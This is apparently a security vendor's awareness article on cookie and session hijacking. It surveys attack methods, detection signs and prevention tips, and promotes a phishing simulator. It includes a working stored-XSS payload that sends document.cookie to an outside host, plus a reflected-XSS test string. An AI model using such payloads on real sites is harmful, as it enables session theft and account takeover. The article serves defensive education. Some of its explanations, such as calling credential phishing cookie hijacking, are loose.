What is Cookie Hijacking aka Session Hijacking?

In the hacking world, people call cookie hijacking "cookie stealing" or "session hijacking." We've shared cookie hijacking example below to help you understand how attackers can steal these cookies and get into accounts. These examples show how hackers can trick you or use website weaknesses to grab your cookies. By learning about these methods, you can better protect yourself from such attacks.

What is cookie hijacking?

Cookie hijacking is a hacking technique to steal a session from a user to access its account. Threat actors use cookie session hijacking attacks to compromise your account.

For example, when you log in to your social media account like Linkedin or Instagram. You always have a valid session, including cookies on your browser. If a hacker steals your session using cookies, they can access your account without your permission.

Is cookie hijacking the same as session hijacking?

Yes, cookie stealing session hijacking is the same. "cookie" refers to session cookies. When someone takes control of these cookies, they can get into the user's session without permission, which is session hijacking.

How are session cookies hijacked?

Session cookies are hijacked through various methods:

1. Packet Sniffing: Attackers capture unencrypted data transferred over a network, intercepting cookies.
2. Cross-Site Scripting (XSS): Malicious scripts are injected into web pages. When executed, these scripts steal cookies.
3. Man-in-the-Middle (MITM) Attacks: Attackers intercept network traffic to capture web sessions between the browser and the web server.
4. Malware: Malicious software on the user's device can steal session tokens stored in the browser.
5. Physical Access: If someone gains physical access to a device, they can directly access the stored cookies.
6. Social Engineering: Deceiving users into disclosing their session details or clicking on harmful links.

Each method exploits network, web application, or user behavior vulnerabilities to access and hijack session cookies.

What is an example of cookie hijacking?

An example of a cookie hijacking attack happens when someone tricks you into visiting a fake website. Imagine you get an email that looks like it's from your bank. It asks you to click on a link and log in. But the link takes you to a fake site that looks just like your bank's real website.

When you enter your username and password, the attacker gets them. They can then use this information to log into your real bank account. This is a cookie-hijacking example because the attacker uses your login details to take over your session on the bank's website.

Phishing Attack

Attackers try every possible way to gain unauthorized access to your accounts and your sensitive information. Phishing attacks are a common way attackers hijack cookies. In this method, the attacker sends you an email that tricks you into logging into your account. The email might look like it's from a trusted website or service.

When you click on the link in the email, it takes you to a fake login page. This page looks like the real one, so enter your username and password. The attacker then captures these details. Moreover, they can still access your account even if you have Multi-Factor Authentication (MFA) turned on.

This is because when you log into your account, your browser receives session details from the server. If the attacker monitors your internet traffic, they can steal your session information. This allows them to take over your account without needing the extra authentication.

The video below demonstrates a good example of cookie hijacking.

XSS Attacks

Another method of cookie hijacking is XSS Cookie Hijacking. An attacker needs an XSS vulnerability on the target website to demonstrate this method. If the target website is vulnerable to XSS attacks, the attacker sends a URL to the victims to steal their session data. Or they can post a comment with infected JavaScript code depending on the type of XSS vulnerability.

Stored XSS attack example payload:

     
       

         

           $ <script type=“text/javascript”>document.location=“http://192.168.0.48:5000/?c=“+document.cookie;</script>
          

       
     
      Copy
    

Reflected XSS attack example payload:

     
       

         

           $ https://vunerablesite.com/index.php?q=<script type=”text/javascript”>alert(‘XSS’); </script>
          

       
     
      Copy
    

Malware

Attackers often use malware for cookie hijacking. Attackers secretly create harmful software to access and steal session keys for online activities. Attackers distribute this malware differently, like attaching it to emails or hiding it in cracked software.

When someone opens these attachments or installs this software, the malware gets into their computer. Once there, it takes over the session keys through cookie hijacking. This allows the attackers to control your online accounts without you knowing.

Man in the Middle Attack

A Man-in-the-middle (MITM) attack is another method used for cookie hijacking. In this attack, the attacker secretly places themselves between you and the website you're visiting. This can happen when you use an unsecured Wi-Fi network, for example. The attacker intercepts the communication between your computer and the website.

During this interception, attackers can steal the cookies sent back and forth. Remember, these cookies often contain session keys or other important data that keep you logged in to websites. With this information, the attacker can hijack your sessions.

This means they can access your accounts on these websites just like they were you, without needing your password. This attack is sneaky because you might not notice anything unusual while it's happening.

How to detect cookie hijacking?

Detecting cookie or session hijacking can be challenging for an average internet user. Account takeover often happens without any obvious signs. Follow these best practices to reduce the risk and check if your cookies have been hijacked.

Unexpected Account Behavior: If you notice unusual activities in your online accounts like:

1. unauthorized posts
2. unusual messages
3. unknown transactions
4. follow requests to people you don’t know
5. like, comment, retweet, etc., on someone's post

The above unusual activities are signs that someone else has gained access to your session cookies.

1. Active Sessions From Unknown Locations: Many services, such as email or social media platforms, let you check where your account is logged in. Email and social media platforms show recent login activity. If you see sessions from locations or devices you don't recognize, that indicates cookie hijacking.
2. Sudden Logouts: If you are unexpectedly logged out of websites where you were previously logged in. Especially if it happens repeatedly, it could be a sign of session hijacking.
3. Use of Unsecured Networks: If you have used unsecured public Wi-Fi networks, your session cookies may be more vulnerable to hijacking. Be wary of any anomalies after using such networks.

How to prevent cookie hijacking?

1. Use HTTPS: Secure websites encrypt data; always check the URL.
2. Two-Factor Authentication: Adds a code step for login verification.
3. Avoid Public Wi-Fi: Public networks are less secure; use them cautiously.
4. Use Secure VPN: VPNs encrypt data on public Wi-Fi.
5. Clear Cookies Regularly: Deletes stored session info; reduces hijack risks.
6. Update Software: New updates fix security vulnerabilities.
7. Beware of Suspicious Links: Malicious links can steal data; don't click.
8. Secure Network Settings: Firewalls and secure settings protect data.
9. Phishing Awareness: Recognize fake emails to protect your information.
10. Lock Your Computer: Prevent unauthorized physical access.
11. Full Disk Encryption: Encrypts your hard drive, securing all data.
12. IP/Geo-Location Restrictions: Limits account access to certain areas.

Each point provides an additional layer of security against cookie hijacking.

Please check the videos below and learn more about how attackers steal cookies.

Cookie hijacking prevention by Keepnet Labs

Keepnet’s Phishing Simulator can demonstrate cookie hijacking and session replay hacking methods for your employees' awareness.

A YouTube video shows how Keepent’s Phishing Simulator hijacked an account. This account is MFA-protected and HTTPS-enabled. You can use a phishing simulator for similar hijacking methods to test your website's vulnerabilities.

Keepnet Awareness Educator has comprehensive cookie and session hijacking training to help your employees' security awareness.

Keepnet can help you find vulnerabilities for cookie hijacking and session replay attacks if you have a website. You can use our Phishing Simulator with Evinginx2 to understand:

1. Does your web application prevent session cookie hijacking?
2. Can hackers access accounts via hijacked cookies?
3. Do session hijacking prevention methods you implemented work?

Check out the video below to see our Phishing Simulator in action. It shows you how to create simulations of attacks to check how well your security holds up against cookie-hijacking attempts.